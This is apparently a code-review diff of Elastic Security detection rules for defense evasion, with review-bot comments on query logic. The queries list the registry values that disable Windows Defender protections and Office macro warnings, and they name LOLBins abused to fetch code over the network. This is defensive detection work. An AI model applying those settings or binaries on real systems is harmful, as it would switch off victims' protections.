@@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Microsoft Windows Defender Tampering", - "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved\naccording to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple\nenvironments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate\nsoftware installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved\naccording to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity,\nthe configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting),\nand no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit 
Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", "references": [ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", 
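Review bot: The `query` line carried as context in this hunk chains `event.type in ("creation", "change") and (registry.path : ...PUAProtection ...) or (registry.path : ...) or ...` with no grouping around the `or` alternatives; since EQL gives `and` higher precedence than `or`, the `event.type` filter only gates the first `PUAProtection` clause and every other path/value pair matches regardless of event type. Wrapping all alternatives in a single parenthesised group after the `and`, i.e. `registry where event.type in ("creation", "change") and ( (registry.path : ... ) or ... )`, would apply the filter uniformly. This line is not changed by the commit, so it may be a follow-up, but the note rewrite touching this file is a natural place to bump the query as well.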
@@ -27,8 +27,26 @@ "https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -56,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json index 9e8519cb576ef..b6ca6ace3c414 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_misc_lolbin_connecting_to_the_internet.json 
@@ -16,6 +16,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "63e65ec3-43b1-45b0-8f2d-45b34291dc44", "severity": "low", @@ -37,7 +59,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -53,5 +75,5 @@ } ], "type": "eql", - "version": 9 + "version": 11 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json index aa0efa290c4f6..f55e4aefcb4c7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_modify_environment_launchctl.json 
@@ -11,10 +11,37 @@ "language": "kuery", "license": "Elastic License v2", "name": "Modification of Environment Variable via Launchctl", - "query": "event.category:process and event.type:start and\n process.name:launchctl and\n process.args:(setenv and not (JAVA*_HOME or\n RUNTIME_JAVA_HOME or\n DBUS_LAUNCHD_SESSION_BUS_SOCKET or\n ANT_HOME or\n LG_WEBOS_TV_SDK_HOME or\n WEBOS_CLI_TV or\n EDEN_ENV)\n ) and\n not process.parent.executable:(\"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/usr/local/bin/kr\" or\n \"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\")\n", + "query": "event.category:process and event.type:start and\n process.name:launchctl and\n process.args:(setenv and not (JAVA*_HOME or\n RUNTIME_JAVA_HOME or\n DBUS_LAUNCHD_SESSION_BUS_SOCKET or\n ANT_HOME or\n LG_WEBOS_TV_SDK_HOME or\n WEBOS_CLI_TV or\n EDEN_ENV)\n ) and\n not process.parent.executable:(\"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/usr/local/bin/kr\" or\n \"/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin\" or\n \"/Applications/IntelliJ IDEA CE.app/Contents/jbr/Contents/Home/lib/jspawnhelper\") and\n not process.args : \"*.vmoptions\"\n", "references": [ "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/osx/escalate/tccbypass.rb" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7453e19e-3dbf-4e4e-9ae0-33d6c6ed15e1", "severity": "medium", 
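Review bot: The new exclusion `not process.args : "*.vmoptions"` is keyed on an unanchored wildcard over an argument value, so it drops every `launchctl setenv` event carrying any argument ending in `.vmoptions`, a broader carve-out than the IDE case it presumably targets; scoping it to the parent executable, as the existing `process.parent.executable` list already does, or anchoring the pattern to the expected install path would keep the exclusion narrow. The rewritten query also still lists `/Applications/NoMachine.app/Contents/Frameworks/bin/nxserver.bin` twice in that exclusion list; the duplicate is harmless but can be removed while the line is being edited. The added `required_fields` match the five fields the query references.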
@@ -51,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json index 71e18a0268091..8018e4bcbc343 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_ms_office_suspicious_regmod.json 
@@ -11,10 +11,33 @@ "language": "eql", "license": "Elastic License v2", "name": "MS Office Macro Security Registry Modifications", - "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications.\nHistorically, macros have been used for a variety of reasons -- from automating part of a job, to\nbuilding entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as\npart of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a\nsystem, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros\nis one of the top ways that organizations are compromised today. These attacks are often conducted through phishing or\nspear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and\nno warnings are displayed when they are executed. These settings include:\n\n* *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code\nwithout showing a security warning or requiring user permission.\n* *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security\nwarning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should not happen legitimately. The security team should address any potential benign true\npositives (B-TPs), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "registry where event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and \n registry.data.strings == \"0x00000001\" and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating MS Office Macro Security Registry Modifications\n\nMacros are small programs that are used to automate repetitive tasks in Microsoft Office applications.\nHistorically, macros have been used for a variety of reasons -- from automating part of a job, to\nbuilding entire processes and data flows. Macros are written in Visual Basic for Applications (VBA) and are saved as\npart of Microsoft Office files.\n\nMacros are often created for legitimate reasons, but they can also be written by attackers to gain access, harm a\nsystem, or bypass other security controls such as application allow listing. In fact, exploitation from malicious macros\nis one of the top ways that organizations are compromised today. 
These attacks are often conducted through phishing or\nspear phishing campaigns.\n\nAttackers can convince victims to modify Microsoft Office security settings, so their macros are trusted by default and\nno warnings are displayed when they are executed. These settings include:\n\n* *Trust access to the VBA project object model* - When enabled, Microsoft Office will trust all macros and run any code\nwithout showing a security warning or requiring user permission.\n* *VbaWarnings* - When set to 1, Microsoft Office will trust all macros and run any code without showing a security\nwarning or requiring user permission.\n\nThis rule looks for registry changes affecting the conditions above.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user and check if the change was done manually.\n- Verify whether malicious macros were executed after the registry change.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Retrieve recently executed Office documents and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity should 
not happen legitimately. The security team should address any potential benign true\npositives (B-TPs), as this configuration can put the user and the domain at risk.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Reset the registry key value.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Explore using GPOs to manage security settings for Microsoft Office macros.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "registry where event.type == \"change\" and\n registry.path : (\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\AccessVBOM\",\n \"HKU\\\\S-1-5-21-*\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\*\\\\Security\\\\VbaWarnings\"\n ) and\n registry.data.strings == \"0x00000001\" and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"mshta.exe\", \"mshta.exe\", \"winword.exe\", \"excel.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "feeed87c-5e95-4339-aef1-47fd79bcfbe3", + "setup": "If enabling an EQL rule on a 
non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -64,5 +87,5 @@
 ],
 "timestamp_override": "event.ingested",
 "type": "eql",
- "version": 3
+ "version": 5
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json
index 6d0110c229c33..95bb6c8a22f9d 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msbuild_making_network_connections.json
@@ -13,6 +13,28 @@
 "license": "Elastic License v2",
 "name": "MsBuild Making Network Connections",
 "query": "sequence by process.entity_id\n [process where process.name : \"MSBuild.exe\" and event.type == \"start\"]\n [network where process.name : \"MSBuild.exe\" and\n not cidrmatch(destination.ip, \"127.0.0.1\", \"::1\")]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 47,
 "rule_id": "0e79980b-4250-4a50-a509-69294c14e84b",
 "severity": "medium",
@@ -48,5 +70,5 @@
 }
 ],
 "type": "eql",
- "version": 8
+ "version": 9
 }
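Review bot: The rewritten query line still lists `"mshta.exe"` twice in the process.name set; since the line is being changed anyway (only the trailing whitespace after `and` differs), it could be deduplicated to `process.name : ("cscript.exe", "wscript.exe", "mshta.exe", "winword.exe", "excel.exe")`. The new `required_fields` entries do match the four fields the query reads (event.type, process.name, registry.data.strings, registry.path), and moving the "## Config" text into `setup` leaves the investigation guide free of setup prose. The enclosing JSON object starts before this hunk and its closing lines sit in the following hunk.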
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json
index 7263381bfd007..46ea6bc42bd71 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_mshta_beacon.json
@@ -13,6 +13,38 @@
 "license": "Elastic License v2",
 "name": "Mshta Making Network Connections",
 "query": "sequence by process.entity_id with maxspan=10m\n [process where event.type in (\"start\", \"process_started\") and process.name : \"mshta.exe\" and\n not process.parent.name : \"Microsoft.ConfigurationManagement.exe\" and\n not (process.parent.executable : \"C:\\\\Amazon\\\\Amazon Assistant\\\\amazonAssistantService.exe\" or\n process.parent.executable : \"C:\\\\TeamViewer\\\\TeamViewer.exe\") and\n not process.args : \"ADSelfService_Enroll.hta\"]\n [network where process.name : \"mshta.exe\"]\n",
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.executable",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "c2d90150-0133-451c-a783-533e736c12d7",
 "severity": "medium",
@@ -34,7 +66,7 @@
 "technique": [
 {
 "id": "T1218",
- "name": "Signed Binary Proxy Execution",
+ "name": "System Binary Proxy Execution",
 "reference": "https://attack.mitre.org/techniques/T1218/",
 "subtechnique": [
 {
@@ -48,5 +80,5 @@
 }
 ],
 "type": "eql",
- "version": 5
+ "version": 7
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json
index 8f8871b75022e..ae6c7244ce053 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_msxsl_network.json
@@ -16,6 +16,28 @@
 "references": [
 "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml"
 ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "b86afe07-0d98-4738-b15d-8d7465f95ff5",
 "severity": "low",
@@ -44,5 +66,5 @@
 }
 ],
 "type": "eql",
- "version": 7
+ "version": 8
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json
index 3b2fc2d414465..ec99f11b91dbe 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_connection_from_windows_binary.json
@@ -13,6 +13,23 @@ "license": "Elastic License v2", "name": "Unusual Network Activity from a Windows System Binary", "query": "sequence by process.entity_id with maxspan=5m\n [process where event.type in (\"start\", \"process_started\") and\n\n /* known applocker bypasses */\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n [network where\n (process.name : \"bginfo.exe\" or\n process.name : \"cdb.exe\" or\n process.name : \"control.exe\" or\n process.name : \"cmstp.exe\" or\n process.name : \"csi.exe\" or\n process.name : \"dnx.exe\" or\n process.name : \"fsi.exe\" or\n process.name : \"ieexec.exe\" or\n process.name : \"iexpress.exe\" or\n process.name : \"installutil.exe\" or\n process.name : \"Microsoft.Workflow.Compiler.exe\" or\n process.name : \"MSBuild.exe\" or\n process.name : \"msdt.exe\" or\n process.name : \"mshta.exe\" or\n process.name : \"msiexec.exe\" or\n process.name : \"msxsl.exe\" or\n process.name : \"odbcconf.exe\" or\n process.name : \"rcsi.exe\" or\n process.name : \"regsvr32.exe\" or\n process.name : \"xwizard.exe\")]\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": 
"1fe3b299-fbb5-4657-a937-1d746f2c711a",
 "severity": "medium",
@@ -41,5 +58,5 @@
 }
 ],
 "type": "eql",
- "version": 2
+ "version": 3
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json
index 135f70740692c..b42425bd62113 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_network_watcher_deletion.json
@@ -14,13 +14,38 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Azure Network Watcher Deletion",
- "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.NETWORK/NETWORKWATCHERS/DELETE\" and event.outcome:(Success or success)\n",
 "references": [
 "https://docs.microsoft.com/en-us/azure/network-watcher/network-watcher-monitoring-overview"
 ],
+ "related_integrations": [
+ {
+ "integration": "activitylogs",
+ "package": "azure",
+ "version": "0.12.0"
+ }
+ ],
+ "required_fields": [
+ {
